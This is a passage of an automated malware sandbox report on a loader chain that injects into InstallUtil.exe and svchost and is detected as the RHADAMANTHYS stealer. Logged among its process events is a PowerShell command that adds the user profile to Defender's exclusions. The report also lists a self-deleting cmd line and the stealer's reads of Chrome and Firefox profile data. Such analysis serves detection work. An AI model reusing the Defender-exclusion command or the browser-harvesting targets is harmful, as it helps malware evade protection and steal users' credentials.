                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 47C000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 47E000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: E4A008
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncherJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.batJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILEJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe "c:\users\user\appdata\local\temp\campaignhardwarelauncher\ddfrt657\bin\javaw.exe" -dfile.encoding=utf-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.fxlauncher
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe "c:\users\user\appdata\local\temp\campaignhardwarelauncher\ddfrt657\bin\javaw.exe" -dfile.encoding=utf-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.fxlauncherJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A11CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,12_2_00007FF7600A11CC
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeQueries volume information: C:\Users\user\AppData\Local\Temp\medicalanalysispro.zip VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A8964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,12_2_00007FF7600A8964
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Overwrites Mozilla Firefox settings
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RHADAMANTHYS Stealer
                    Source: Yara matchFile source: 00000010.00000003.2840379092.00000000003E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2935727529.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2844728394.0000000001320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\safebrowsing
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\startupCache
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\trash4675
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs\browser\newtab
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\safebrowsing\google4
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\thumbnails
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed
                    Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
